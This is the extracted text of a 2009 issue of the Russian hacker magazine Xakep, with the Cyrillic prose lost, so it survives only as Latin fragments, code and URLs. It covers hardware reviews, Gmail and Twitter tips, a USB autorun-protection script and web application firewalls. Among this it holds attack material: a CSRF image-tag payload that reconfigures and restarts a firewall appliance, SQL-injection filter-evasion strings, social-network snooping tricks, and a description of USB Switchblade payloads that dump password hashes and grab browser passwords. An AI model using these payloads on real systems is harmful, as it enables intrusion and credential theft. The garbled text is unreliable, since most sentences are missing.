
: iPhone

. 56

x 03()2009

w w w.xakep.ru
03 (123) 2009

/ ARMY.MIL


ARMY.MIL . 48

123

WEP

. 64

. 30


WI-FI
WEP

USB-


LINUX
. 84

10
,
- . ,
.

,
party.xakep.ru.

,
Capture the flag, . , 2 .

nikitoz, . .
party.xakep.ru

, !

CONTENT03(123)
004 MEGANEWS

FERRUM
016 !

AMD
PC_ZONE
020 Google

gmail.com
026

030
USB-
034

038 Easy Hack



042

048 ARMY.MIL

052 CMS eZ Publish
CMS
056
Apple iPhone
064 WEP
,
weplab aircrack
068

072 -Tools

076 X-Profile:

080

Ubuntu 8.10

084

Linux

088

?
092 Python

096 - Symbian

Symbian? !
102

Pythone

106 Verilog

Verilog
112

116

SYN/ACK
120
PPTP- Windows Server 2008
126
MegaFAQ Windows Server 2008
130
Linux

134
Symon:

138 FAQ United


FAQ
141

143
8,5
144 WWW2
web-


>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>

Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN\ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)

Dr. Klouniz
(alexander@real.xakep.ru)

Dlinyj
(dlinyj@real.xakep.ru)
>

(lyashchenko@gameland.ru)

/DVD

>
Step
(step@real.xakep.ru)
> Unix-
Ant
>

(komarov@gameland.ru)
>

/Art

>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)
>

/xakep.ru

>

(xa@real.xakep.ru)

/ .: (495) 935-7034, : (495)


780-8824
> GAMES & DIGITAL
(goryacheva@
gameland.ru)
>





>

>
( )
(strekneva@
gameland.ru)
>

>


> -
(alekseeva@
gameland.ru)

/Publishing

>

(noah@gameland.ru)
>

>

(dmitri@gameland.ru)
>

(shostak@gameland.ru)
>

(romanovski@gameland.ru)
>

(stepanovm@gameland.ru)
>

(leonova@gameland.ru)
>

(ladyzhenskiy@gameland.ru)
>PR-

(litvinovskaya@gameland.ru)

>


(andrey@gameland.ru)
>

(kosheleva@gameland.ru )
>

(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24

>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,


,

77-11802 14 2002 .

Lietuvas Rivas, .
100 000 .
.

.
:

. ,

,
.

.


.
.

Gameland
, ,
Gameland TV. , content@
gameland.ru.

>> meganews

MIFRILL

/ MIFRILL@REAL.XAKEP.RU /

Nintendo

Nintendo DSi, ,
.
. , DSi
, , , . Nintendo
GameBoy Advance , ,
. ( - ,
), SD-, 3.25. , DSi
-. Nintendo DSi
Camera, Nintendo DSi Sound Nintendo DSi Shop ,
,
WiFi ( DSi ). 169.99
, 149 ,
.

Skype

Microsoft,
,

5%

20% .

, Skype Windows
. Skype, ,
, , . , .
, , ,
- 400 /, 30 ! , , , , 50% , .
, .
,
, -. nokia! Skype Nokia
. ,
N-, Skype-. Nokia N97.


, , Creative Live! Cam Video
IM Ultra. 1.3-
,
5.0 (
) -.
,

, USB
Plug & Chat (



).

, muveeNow 2.0 Live!
Central Premium.
, Smart Face
Tracking
, .

2250 .
X 03 /123/ 09

,

-
. ,
- . , , ,
. ,
, .
() -
. ,
. :
, , . , .
, , , . ,

, ,
-.

6% .

2008
. 22%


Downadup (
Kido Conficker), .
,
, ,
Conficker B++.
,
. , Conficker
: .
Microsoft. $250.000
, Conficker. , Microsoft , ,
Server service (, ,
),
. ,
Windows Update .

5.5 16.5 .

Linux
.

. .

. ,
Eco-Box, , , , , ,
.
Origo Industries,
Origo
. , , CO2

-,
.
, , ,
.
,
. ,
. , ,
,
.


. Google.
-, , Google
Google Maps, .
, :
. , Google
. -, Google
,
. Google
Health . , , ,
, \. ,
, , , Google.
, , Google Maps Latitude (

Android Windows Mobile 5.0,


BlackBerry, iPhone, iPod Nokia Symbian).
Latitude ,
, .
, Google Maps, ,
. ,
, ,
, .

, ,

35.5% .

3 ,


,
, .
,
, .

( ), .
,
MS Word . ,
, , , ,
. ,
,
. , .


Sun
Tech Days, Sun Microsystems,
, .
4- -,
8 10 . , Sun
Tech Days 1500 , , .

, .
40 , ,
Sun Microsystems
OpenSolaris 2008.11, JavaFX, NetBeans 6.5, xVM Server, MySQL.


-,
JavaFX OpenSolaris. University Day (10
) ,
, , .
,
Sun Microsystems
.
, : , - Client Software Group,
, - Solaris Data,
Availability, Scalability HPC Sun Microsystems Inc.
, , ,
: http://developers.sun.ru/techdays2009.

5
2.5

, , , ? , , , , HP
TouchSmart tx2z. , ,
, HP
. , TouchSmart tx2z .
12.1 1280800 ,
180, AMD Turion X2 2.1 , DDR2
RAM ( 8 , 3 ), ATI Radeon
HD 3200 250 . ,
DVD-. ,
, , ,
. , TouchSmart tx2z .
, $1.800-2.000,
HP $1000. , ,
, , , .



Microsoft, , .
Bill & Melinda Gates
Foundation. , ,
. , , TED,
,

? ,

. - Microsoft
, , , ,
. ,
.
, .

Mobile World Congress, ,


Sony Ericsson. Idou (
, ) ,
, .
12.1 , ,
! Sony Cyber-Shot, ,
.
3.5 360x640 , , GPS, FM-, mircoSD- Wi-Fi,
Bluetooth, USB.
Symbian Foundation, .
.



, :

.
.
,
,
, .
, .
, , . ,
, ,
.
, 20 ,

.

( ,
). , .
10 . 5 . ,
.

83% .

Ion
,
Ion NVidia ,
.
, , Ion
, -
Intel Atom.
,
GeForce 9400.
Atom -
,
1080p,
Windows Vista Windows 7.
NVidia , $299.
,
Intel NVidia .

, CPU GPU.
, ,
, .


!
Psion ,
. Psion , ,
(netbook), .
,
. ,
netBook netBook Pro. ,
Canadian Psion Teklogix ( Psion, ) . ,
Gizmodo. Psion
, .
Dell . Dell (USPTO)
Psion netbook.
, Psion
.
....

=
Facebook
. , ,
. , ,
, , . Facebook
150 . , , , .
, Facebook .
,
, , Facebook 10
120.000 .
, , ,
. Facebook

.



,
Apple, IT-.
, Apple 1987
,
. ,
,
Fusion-io. SSD-,
$10.000 $100.000. Fusion-io
,
, ,
. , !



, .
-
The Pirate Bay (TPB). ,
,
,
$140.000. , ,
Warner Bros.,
MGM Pictures, Columbia Pictures, 20th Century Fox Sony BMG.
14
. vs Twitter .
, ,
, ,

,
. , ,
. - (
) : ,
. , . . , , , ,
,
. , ,
3-5 . TPB .
, -,
, .

90% -, ,


IBM,
. , ,
, . IBM, ,
, ,
. 10 IBM,
, , . .

, .
, , ,
... ,
. , , ,
( , . .) , .
, , .
, , , .
, , , .

>> ferrum

!
AMD

,

Advanced Micro Devices.
AMD Phenom II
. , , , AM-2+ .
! AMD,
NVIDIA ( ,
/ ).

,
.
:
1. . ,
- ( , SATA ).
2. . , .
3. : , 3DMark06,
, -


WinRar (, ).
4. . FarCry.
5. ( , ) Everest
Ultimate 4.50 ( stress-test). ,
. - ,
(,
) .
, .
Futuremark
,
.
/. !
FAR CRY (FPS)


: AMD Phenom X4 9650
, : 2 (Corsair XMS2-8000 2x512 , OCZ PC2 8000 2x512
)
: RAID 0 Samsung 80 SATA II
: Sapphire ATI Radeon HD 4870
DVD-: LG GSA-H62N
: GMC R2 TOAST
: ThermalTake W0131RE 850W
: Microsoft Windows XP

[Chart: Far Cry (FPS). Boards compared: MSI DKA790GX, Gigabyte MA790GP-DS4H, Foxconn A7DA-s, Biostar TA790GX A2+, Asrock A780FullHD, ASUS Crosshair II Formula]

ASUS Crosshair II Formula


:

BEST BUY

: NVIDIA nForce 780a SLI


: AMD Phenom/Phenom X4/Phenom
X3/Athlon 64 X2/Athlon 64/Athlon/Athlon 64 X4/Sempron
: 8 , 4xDIMM DDR2, 667 1066
: 3xPCI-Express 16, 1xPCI-Express 1, 2xPCI 32-
: NVIDIA SLI 3-way
: 6xSATA II, 1xIDE, 1xFDD
: 1xPS/2. 6xUSB 2.0, 1xIEEE1394, 1xE-SATA,
2xGbE LAN, HDMI, , , D-SUB,
7.1- ( PCI-Express)

Asrock A780FullHD
:
: AMD 780G
: AMD Phenom/Phenom X4/Phenom
X3/Athlon 64 X2/Athlon 64/Athlon/Athlon 64 X4/Sempron
: 16 , 4xDIMM DDR2 DIMM, 533 1066
: 1xPCI-Express 16, 1xPCI-Express 1, 2xPCI 32-
: Hybrid CrossFireX,
ATI Radeon HD3300
: 6xSATA II, 1xIDE, 1xFDD
: 2xPS/2. 6xUSB 2.0, GbE LAN, DVI, D-SUB,
5.1-

8300 .
ASUS,

.
( WinRar
1156 /).
ASUS CPU Level Up. . BIOS , .
( ),
.
: , . ,
PCI-Express 1.

, , .

1800 .
1800 ,
!
. - mATX, .
, , : 4
1066 PCI-Express
x16 . SATA II.
AMD
AM2/AM2+ .

Realtek ALC662 ,

- - Creative X-Fi.
, (
2000 . ). ,
Radeon HD 4870 X2.

[Two charts, the first WinRAR. Boards compared: MSI DKA790GX, Gigabyte MA790GP-DS4H, Foxconn A7DA-s, Biostar TA790GX A2+, Asrock A780FullHD, ASUS Crosshair II Formula]

Gigabyte

Biostar TA790GX A2+

Foxconn A7DA-S

: AMD Phenom/Phenom X4/Phenom


X3/Athlon 64 X2/Athlon 64/Athlon/Athlon 64 X4/Sempron
: 16 , 4xDIMM DDR2 DIMM, 533 1066
: 2xPCI-Express 16, 2xPCI-Express 1, 2xPCI 32-
: Hybrid CrossFireX,
ATI Radeon HD3300
: 6xSATA II, 1xIDE, 1xFDD
: 2xPS/2. 4xUSB 2.0, 1xIEEE1394, 1xE-SATA,
GbE LAN, HDMI, DVI, D-SUB, 7.1- .

: AMD 790GX
: AMD Phenom/Athlon 64 FX/Athlon 64
X2/Athlon 64/Sempron
: 8 , 4xDIMM DDR2 DIMM, 533 1066
: 2xPCI-Express 16, 2xPCI-Express 1, 2xPCI 32-
: Hybrid CrossFireX,
ATI Radeon HD3300
: 6xSATA II, 1xIDE, 1xFDD
: 2xPS/2. 4xUSB 2.0, 1xIEEE1394a, GbE LAN,
HDMI, DVI, D-SUB, 7.1-

2900 .

4400 .

, . ,
Smart Fan. ,
.
, ,
,

.

Foxconn A7DA-S 790GX. -,


.
-, BIOS
. -,
( ).

FireWire ( ). eSATA-.
, ,
eSATA- . ,
PCI-Express x16,
-. ,
- .

USB 2.0 (
6). eSATA ,
. , ,
, , .
,
.

[Chart: 3DMark 2006 (marks). Boards compared: MSI DKA790GX, Gigabyte MA790GP-DS4H, Foxconn A7DA-s, Biostar TA790GX A2+, Asrock A780FullHD, ASUS Crosshair II Formula]

, .


:
: AMD 790GX
: AMD Phenom/Athlon 64 FX/Athlon 64
X2/Athlon 64/Sempron
: 16 , 4xDIMM DDR2 DIMM, 667 1066 ,
: 2xPCI-Express 16, 3xPCI-Express 1, 2xPCI 32-
: Hybrid CrossFireX,
ATI Radeon HD3300
: 6xSATA II, 1xIDE, 1xFDD
: 2xPS/2. 4xUSB 2.0, 1xIEEE1394a, GbE LAN,
HDMI, DVI, D-SUB, 7.1- ,

EDITOR's CHOICE

Gigabyte MA790GP-DS4H


MSI DKA790GX
:

5500 .

: AMD 790GX
: AMD Phenom/Athlon 64 FX/Athlon 64
X2/Athlon 64/Sempron
: 8 , 4xDIMM DDR2 DIMM, 667 1066
: 2xPCI-Express 16, 2xPCI-Express 1, 2xPCI 32-
: Hybrid CrossFireX,
ATI Radeon HD3300
: 5xSATA II, 1xIDE, 1xFDD
: 1xPS/2. 6xUSB 2.0, 1xIEEE1394, GbE LAN,
HDMI, DVI, D-SUB, 7.1- , , 1xE-SATA

4900 .
, , . PCI Express 1 , .
, , ,
.
. ,
AMD.

. ? , -,
, .
- , ,
- .
,
. , , BIOS
,
. , ,
eSATA, .
, .

SATA II. ,
AMD 790GX, eSATA-
( , , eSATA
!).

.
, .

MSI DKA790GX,
. , -

AMD 790GX.
Asrock A780FullHD ,
. z


>> pc_zone


/ STEP@GAMELAND. RU/

GOOGLE
GMAIL.COM

, . , , ,
. , - . !

. ,
- -
, Exchange . ! , ,
. Gmail,
, , .
,
, - .

GMAIL?
. -, .
, . .

, Gmail offline, ,
, .
- .
, 7 :).
, , . , -
: .


- , -
Gmail
,
( ).
300-400 -.
Gmail !

. (
labels) ,
. , , Outlook The Bat! . :
Gmail.
( ) 99% .
, Gmail .
, 3 ,
. Google
!

0:
Gmail : ,

, .
, , ,

Gmail , addon
. ? Gmail , ,
? .
Gmail
. ,
English !

1:
, . ,
Gmail? ?
, . : step@real.xakep.ru stepan.ilyin@
gmail.com. Gmail ! :) ,
,
. , ,
, . ,
,
POP3.
, Outlook Bat. Settings
Accounts. Get mail
from other accounts , , ,
Add another mail account.
, : email,
/ POP3-. SSL-, ,
. , Gmail -
Inbox. :
(, IMAP
Exchange ), Gmail . ,
, 300
, .
.
. , Gmail.

,
. : Gmail
. ,
Accounts Add another email address you own
email.
( , , ) . , - .


2: GMAIL GOOGLE
Google ,
. , ,
, :
from:<>
( )
subject:<>
label:<>
filename:< >

in:inbox/in:trash/in:spam
is:starred :)
is:unread/is:read
is:chat

, from:nikitoz label: is:unread


ftp ftp. ?
, ( -

Show search options).

3: GMAIL LABS
Google , .
, , ,
- Beta (,
,
),
. ,
Gmail Labs ( ). :
Offline Gmail ( 4);
Tasks (todolist) ;
Quick Links , ,
;
Signature tweaks ;
Navbar drag and drop
, ;
Custom Label Colors
(labels);
Multiple Inboxes Gmail;



Flacky Mode : , ,

,
. , ,
Spam Trash , Gmail
. .
, .
-, . ,
.

. , ,
Gmail labs.
Flacky
Connection,
. Gmail
, . ,

.

info



Google Gtalk,

XMPP
(Jabber).
Gmail

Jabber-
.
,

AOL,

,

.
,
:).

5: GMAIL

, , Gmail

Create a Document ;
Google Docs gadget
Google Docs.

4: GMAIL
,
,

. Gmail

.
Vombato Mail Drive
(www.vombato.com)


,

POP3.


! -,
-
, ! Gmail
, . ,
Google Gears, - ,
,
Gmail. Google,
.
, -, :). , , gmail.com , , ,
. ,
Gmail Labs,
, Offline
. :
, .
, Gmail
,
.

, Gmail
? ,
. Google Chrome (www.
google.com/chrome), Gmail . offline-
.
Mozilla Prism
(labs.mozilla.com/projects/prism),
, MacOS, Linux. ,
Mailplane (mailplaneapp.com),
Gmail.

6: GMAIL
,
.
- . , ,
Gmail ,
. ---! Send by
Gmail dragndrop . ,
gAttach, Affixa (www.affixa.com). ,
(Microsoft Office, Adobe
Acrobat ..)
.
mailto,
, ,
Gmail

Gmail

Gmail Labs
Yahoo! Mail. , ( Build 1229) .
mailto ,
Opera Mail (M2), -

Gmail!
- , SSL- . ,
,
HTTP-
. , , .
:
https://www.google.com/accounts/ServiceLogin?...

HTTP, :
http://mail.google.com/mail

https, .
, -
, - (, VPN).
The Middler, Defcon16. ,
-,
Gmail. Google

(Always use https),
. .
The Middler . ,
, Ruby ( )
.
,
ARP- DNS/DHCP-. The
Middler :
user- , HTTP;
HTTPS HTTP;
-.

. Preferences Advanced
Programs.

7:
, Gmail:
, ,
(
Gmail Drive). ,
. Google
: .
,
CookiePie (www.nektra.
com/oss/firefox/extensions/cookiepie) Firefox,

, , Gmail.
Firefox, Gmail Manager (https://addons.mozilla.org/en-US/firefox/
addon/1320), .

Gmail

-
.
, ,

(server-side e-mail filter). :
1. Gmail;
2. Gmail . ,
, Gmail ,
,
header.
3. ,
, Gmail. Inbox
(, Gmail ).
Gmail. :
Gmail ? :
X-Forwarded-For: user@gmail.com forwarded@to.com
X-Gmail-Received: some-random-number
Delivered-To: user@gmail.com


, .
,

,
, , .

8: GMAIL
- , Gmail 7
. , , ?
, ,
. ! :)
GMail Drive (www.viksoe.dk) .
,
. ,
.
? , ,
Gmail Drive Config (http://convivea.com).
, Python GmailFS (richard.jones.name),
Mac OS gDisk (gdisk.sourceforge.net).
,
Gmail.
Php Gmail Drive (pgd.sourceforge.net), PHP
Gmail libgmailer
(sourceforge.net/projects/gmail-lite).

9:
Gmail Labs
. , Greasmonkey
Firefox. :
, ! , Gmail ,
- .
, Better Gmail 2 Firefox (addons.mozilla.
org/en-US/firefox/addon/6076). ,
Greasmonkey, , !
:
;
;
, ;
;
;
..

10: GMAIL
Gmail ! FAQ. ,


, Gmail
. ,
Gmail Lite (gmail-lite.sourceforge.net). Gmail (
AJAX-). Google
HTML-
. Gmail Lite, , ,
- .
- PHP.
, .
www.tedsta.com/gmail/index.php,
:).
libgmailer.
11:
, Google,
100% , .
, ,
- .
, , . , Gmail
Gmail Backup (www.gmail-backup.com).
email, , , ,
IMAP EML
. Restore,
. ,
, . , , wxPython (http://wxpython.org). z


/ ALEKS.RAIDEN@GMAIL.COM /

.
, , CNN
BBC . nipp
140 .
.

? , :
, .
: , , ,
. : + = .

140
-
, . , ,
( follow, ).
http://
twitter.com/_.
, ,
, follow-.
, , .
140 .
? ,
, SMS
, . ,
,
. ,
Linux ,
0-day . 140 :
SMS 160
. ( , API),
,


. , , , iPhone, Nokia
, Java-.
SMS-, ,
.

?
:
. ?. ,
. : , ? ,
, . : !
, ,
, . ... .
.
: , 16-00, !? .
friend- ,
. . ,
, , , .
. ,
-

info


API,
,
. ,
WHOIS username
(
), GET
username ( ), FAV username
( ), INVITE phone
number (
,
).


(http://
twitter.zendesk.
com/forums/10711/
entries/14020).

, /
.
.
, , .
,
,
. Wordpress ,
. ,
140 ! ,
, !
? ,
- .
, (,
). ?
- !

TWITTER-

API.

: ,
,
.

(apiwiki.twitter.com). , , ,
, :).


?

. ,
,
, .
.
, ! , ( ), ,
, , ,
. - .
, :
, .
http://www.rutwitter.com/r/?page=1 - . ,
Umputun (- ): 2486 .


dvd
DVD-

,


(
-?).

warning


,


,

,
.
, -

,
,
.

links
http://twitter.
pbwiki.com/Apps

- ,
.


Digsby Twitter-

API -. hello world!,


-.
.
,
. -

,
(
?).
AIR- twhirl, (twitter.
com/abrdev) .
. , , -

Twitter-
,
, .
,
.

,

.
- -

. @
.
,
-.
,
,
. -
,
!

, ,
!

,
follow-

!
. , . ,
. , .
, -
: Twitter ?!.
:). z

(twitter.com/downloads) . PC, , iPhone/iTouch, Google


Desktop-, Mac-, Linux- ,
, . , ,
, .
( The Top 21 Twitter Applications,
www.techcrunch.com/2009/02/19/the-top-20-twitter-applications). 20
- .

. ,
, API. ! , ,
,
. , (http://
twittercounter.com),
- (http://twitter.com/widgets), (http://www.
tweetfind.com), (http://
twittercounter.com/pages/country?time_zone=Kyev)
, , ( , ).

( :
http://twitter.com/jack) 2006 ,
.

, , .
-,
MTV Music Award, Apple WWDC 2007. , , , ,
.
, ,
, .
,
.
6 . , ,
50 . Facebook,
500 , .
, ,
.
,
, 0 .
Ruby on Rails MySQL. ,
memcached.
( - 600
!) 8 Sun.
8- 180 HTTP-
Monreal RoR. . ,
. ,
RoR ,
Twitter. , Java
++, , , .


STEP
/ STEP@GLC.RU /


USB-

: . ,
, ,
. : USB-. . .

- -
.
: ,
. ,

?
, . , ,
2 autorun.inf .
,
autorun.inf , ,
. ,
,
. Downadup,
, , ,
. , -,
, -, .

NTFS , 1
.
, , . ,
. , ,
(, , ). ,
FAT32, ,
NTFS, .


NTFS HP: HP USB Disk Storage Format Tool (


Google SP27213.exe).
NTFS.
, , , .

:
format f: /FS:NTFS

,
:
convert f: /FS:NTFS

, autorun.inf
, USB-. - .
?
( FILES), - // .
.
, .
, , ,
.

HDD HP USB Disk


Storage Format Tool

info
, ,
.
, : ,
, . , ,
Autorun (
).
autorun.inf, FILES.
? , . ,
ACL-, . , ,
, , .
,
,
, .
NTFS
FAT32.
PSP MP3- NTFS. :
NTFS Read only Linux.
! NTFS
. FAT32,
, NTFS
, , ,
, , . ,
!

FAT32, 2
, c NTFS
.
FAT32 , ,
.
autorun.inf. -
AUTORUN.
INF, Read only Hidden.
.
, , . ,
. . AUTORUN.
INF. , ,
. ,
,


NTFS,

.
:

.
,


NTFS,

.

,

:



.

FAT32 !
USB Disk Security (www.
zbshareware.com), AUTORUN.
INF zhengbo. (-, ,
, ). : . -
$50, .

FAT32/NTFS (http://www.xakep.
ru/magazine/xA/062/080/5.asp),



UNC-. ,
UNC
,
.
\\server\share\path,
server .

,
server ? .,


dvd

FAT32/
NTFS
.

warning



, , , .

-
,

.


. :
!

. , : \\?\C:\
folder\file.txt. ,
UNC-
. BAT-
:
mkdir "\\?\J:\AUTORUN.INF\LPT3"


LPT3, AUTORUN.INF
, ,
autorun.inf, !
. -,
UNC- /
: \\?\J:\AUTORUN.INF\LPT3.

: , AUTORUN.INF1. ,
, , . BAT-,
, , , :
, (
),
( , Downadup),
;
AUTORUN.INF COM1 ;
NTFS;
desktop.ini,
.
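rem remove recycle-bin and system folders from the drive the script is run from
rd /s /q %~d0\recycled
rd /s /q %~d0\recycler
rd /s /q "%~d0\System Volume Information"
rem delete autorun.* files, then create an AUTORUN.INF folder holding a reserved-name subfolder
del /f /q %~d0\autorun.*
mkdir "\\?\%~d0\autorun.inf\com1"
attrib +s +h %~d0\autorun.inf
rem the same for desktop.ini
del /f /q %~d0\desktop.ini
mkdir "\\?\%~d0\desktop.ini\com1"
attrib +s +h %~d0\desktop.ini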

, ,
autorun.bat .


,
. ,
, , -,
, , -,
:
Autorun.inf

BAT-
.
. : ,
? !



. - .
,
, ?
, ACL-
. ,
cacls (Change Access Control
Lists)
Windows XP Home Edition.
ACL-
. ,
X: :
cacls X:\
:
X:\ :(OI)(CI)F
F ( Full)
,
(OI)(CI).
, .
:
cacls X:\ /E /R

(Read only):
cacls X:\ /G :R
.
:).

.INI, ,
SYS HKEY_LOCAL_MACHINE\Software.
4. ,
, *.*. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\CancelAutoplay\Files
REG_SZ *.*.
5. MountPoints2, , USB-.
, ,
. .
MountPoints2,
, .
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
, . ,
MountPoints2 .
,
. , ? :)


Windows, ,
. !
Windows ,
. , autorun.
inf :
[autorun]
open = calc.exe
shell\Open\Command=calc.exe
shell\Open\Default=1
shell\Explore\Command=calc.exe
shell\Autoplay\Command=calc.exe

, , ,
. ? ! , ,
, . , :
1. , CD. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Cdrom, AutoRun .
2. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer.
NoDriveTypeAutoRun dword
ff .
HKEY_CURRENT_USER,
.
3. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\Autorun.inf, (
REG_SZ) @SYS:DoesNotExist. Windows ,
autorun.inf , , Windows 95!
, .INI-
. , ,
autorun.inf, HKEY_LOCAL_MACHINE\SOFTWARE\DoesNotExist (, ).
, autorun.inf , .
@



. , , ,
. ,
.
1. AutoRunGuard (autorun.synthasite.com/AutoRunGuard.php).
,
, CD. ,
, .
AutoRunGuard autorun.inf,
, .
2. Flash Guard (www.davisr.com).
. , :
Autorun.inf
;
Autorun.inf;
Autorun.inf;
Autorun.*;
Autorun.inf .
3. USB Disk Security (www.zbshareware.com). ,
. , -.
Flash Disinfector. z


. ,
. Secure Digital (SD) - .
: ,
read only.
, (
,
).



/ KOMAROV@ITDEFENCE.RU /

, ,
. , , , . .

.
,
(IDS)
(IPS).
. , ,
, . , IDS Snort :
,
(, -).
. ,
SQL- 15 3 , 8 .
! ,
:
(Access Complexity);
(Exploitability);
;
(Report Confidence).
VSS (www.first.org/
cvss), . ? , -


,
. ( ) , .

, .

WEB-
X-Force (xforce.iss.net),
IBM, , .
WEB- -
50% . ,
, , Google?
, .
,
,
. ( ) , , - .

, Web Application Security LifeCycle Microsoft
SDL. , ,
, .
,
.

info

XSS-! , IDS .
demo.php-ids.org. , :)

, , ,
WEB Application Firewall (WAF),
Deep Packet Inspection Firewalls (
). , , ,
,
WEB-.
OSI (
), HTTP. , HTTP/HTTPS/SOAP/XML-RPC
. ,
.
GreenSQL (www.greensql.net).
SQL ,
SQL-. WAF ,
-
. mod_security,
http- WEB-,
GreenSQL -, .
, Reverse-proxy, SQL-, ,
MySQL. , ,
.

: , ,
(1=1) ,
TRUE,
.. GreenSQL

,
DELETE, UPDATE INSERT, , DROP
CREATE. , drag
and click, , !
, , WEB- . , GreenSQL
Linux/Unix-,
:


WAF

NSS Labs (nsslabs.
com/certification/
waf/nss-wafv10-testproc.pdf).


(SmartBits SMB
6000, Reflector 2500,
Avalanche 2500)

, ,

WEB-
.
,


.

#
wget http://www.greensql.net/public/releases/
Debian_Etch/i386/greensql-fw_0.9.2_i386.deb
dpkg -i greensql-fw_0.9.2_i386.deb
#
What is the name of the server used to store
GreenSQL configuration db (MySQL server)? <-localhost
What is the database name for the GreenSQL
configuration? <-- greendb
Would you like to set up the database and
tables automatically? <-- Yes
What is the username of the MySQL
administrator? <-- root
Enter the MySQL administrator password <-your_root_sql_password ( mysql
root-a)
Confirm this password <-- your_root_sql_
password ( mysql root-a)
What is the GreenSQL db username? <-- green
What is the GreenSQL user password? <--


GrSecurity .

extension. IIS Manager



greensqlpassword ( green )

links
WAF

owasp.org/index.
php/Web_Application_
Firewall.

,
, .


GreenSQL db username .
, . greensql-fw
3305 , MySQL
3306.
, 127.0.0.1 3305. :
$db_connect = mysql_connect('127.0.0.1:3305',
'mysql_user', 'mysql_password')


. front-enda greensql-console
:
curl "http://greensql.net/download/greensqlconsole-0.4.6.tar.gz" > greensql-console0.4.6.tar.gz
tar -zxvf greensql-console-0.4.6.tar.gz & cd
greensql-console
emacs config.php # ,

greensql-console -
templates_c :
chmod 777 templates_c.
:
.
PHP-IDS (php-ids.org).

Google Group. PHP-IDS
, XSS, RFI, LFI.

, svn.
php-ids.org/svn/trunk/lib/IDS/default_filter.xml.
, ,
. Snort/mod_
security. ,
GreenSQL.



WEB ,
. , Windows
. ,
Linux,
. Microsoft, .
Dynamic IP Restrictions Extension (Microsoft.com) .
2008 Microsoft ,
IT-, web-.

SQL (SQL Injection). , The Dynamic
IP Restrictions Extension .
SQL-, XSS-,
DDoS-.
(SYN-,
DNS- ),
IP-. IP-
HTTP- ,
. , ,

.
IIS7 IPv4 and Domain Restrictions,
Dynamic IP Restrictions Extension IPv6.
iis.net/
downloads/default.aspx?tabid=34&g=6&i=1825.
IIS Manager
.
Edit Dynamic Restrictions .
The Dynamic IP Restrictions Extension
,
HTTP- 403 404, . . ,
IP. ,
IP,
.

(Capture The Flag)
RST/GHC,
.



CSRF-:
<img src=https://host/ajax.html?hostname=hostname
&gateway=10.1.1.1&dns=10.1.1.1&smtp=10.1.1.1&max
_src_conn=100&max_src_conn_rate_num=100&max_src_
conn_rate_sec=10&blacklist_exp=3600&ftp_
server=c__FTP-&ftp_port=21&ftp_
login=user&ftp_passwd=password&ftp_remote_dir=/
&remote_support_on=on&action=configuration&do=save>

,
,
:
<img src=https://host/ajax.html?action=restart&do=
core>

IPS SQL-injection
. z
,
( , ,
).
,
. , -
.
.
Fspy (mytty.org/fspy). .
./fspy . , /.fspy R 1 D s,A O [,T,], , d,:,p,f, size: ,s, atime: ,A
/etc/ ,
/etc/.

:
, . ,
Profense Web Application Firewall (armorlogic.com/profense_overview.
html) CSRF - HTTP-. ,
: Defenses against all OWASP Top Ten
vulnerabilities ,
OWASP (www.owasp.org). ,
. , ,
FTP/SCP, syslog-.

WAF
, WAF,
. , WAF ,
, . ,
WAF
evasion-, .
, UNION SELECT, OR 1=1,
EXEC_XP , , . , OR
1=1, :
OR LALA=LALA ( );
OR LALA=NLALA ( N,
nvarchar SQL-.
,
);
OR LALA=LA+LA ( );
OR LALA in (LALA) ( ).


>>

Easy Hack}

R0ID SKVOZ
/ R0ID@MAIL.RU /

/ KOMAROV@ITDEFENCE.RU /

:

:

-, PHP-
mail() DirectMailer. - ,
Inbox. ,
, .
[INBOX]Golder, DirectMailer.
, :

( 200000 )

email-


:

:
,
www.vkontakte.ru. ,
, ,
:). ,
. ,
.
ID .
,
http://night.doomgate.ru/vkontakte.
.
.
1. vkontakte.ru ,
.
2. ID .
. _
id.





Outlook The Bat
Text/HTML


( [INBOX]Golder
, ,
, ):
1. .
2. , ( , , ).
3. /cgi-bin.
4. inbox.cgi 755, (log, upload, sys) 777.
5. config.txt. ( DVD).
6. config.txt .

3. http://night.doomgate.ru/vkontakte.
4. id
ID .
5. :

,








,

,
,
()

6.
www.vkontakte.ru ID .
, Vrazvedke. , .
. ,
, .
Online,
profile.php .
,
/, :).
. :
Vkontakte . , Firefox :
1. Firefox.
2. about:config,
.
3. filter network.http.redirection-limit.
4. , 0 (
).
5. (Ctrl+T), http://
vkontakte.ru/login.php .
6. , .

3
:
WINDOWS VISTA
:
, , ,
. - , - ,
:). , :
1.
2.
3.
4.
5.





/Start

, . XP,
,
.
, .
:).
,
:

7. - , , http://vkontakte.
ru/friend.php.
8. ( 20).
, . profile.php
.

5. Print Spooler/
. ,
.
6. Security Center/ , .
, . .

:).
, . /
defrag. ,
.
: , .
, , .
!
, HKEY_CURRENT_USER Control
PanelDesktop. MenuShowDelay
, 400 0. ,
:
!
. :).

1. Windows Defender
.
.
2. Computer Browser/ ,
,
. , .
3. Windows Update .

.
4. Windows Error Reporting Service/
/
. XP
-
:).

:

:
, , .
-
. (wget, curl,
fetch), .

1. , :
http://host.ru/dir1/dir2/dir3/file.tar.gz%00
wget: wget -O file.rar http://host.ru/dir1/dir2/dir3/
file.tar.gz%00

2. ,
, HTML-,
. : -
.
, -
BRED3.

BRED , notepad. !

: ,

(, IPOD)
:
, .
USB Switchblade (wiki.hak5.org/wiki/USB_Switchblade) .
Hak5 USB Switchblade, . ,

: Dump SAM (
Security Account Managera Windows), IE/Firefox Password Grabber (
),
VNC-, , . ,
.
( techniques):
1. Max Damage Technique. , : X:\Documents\logfiles ( X -)
.
2. Amish Technique. (hak5.
org/releases/2x02/switchblade/AMISH1.0-payload.rar)
. , , ,
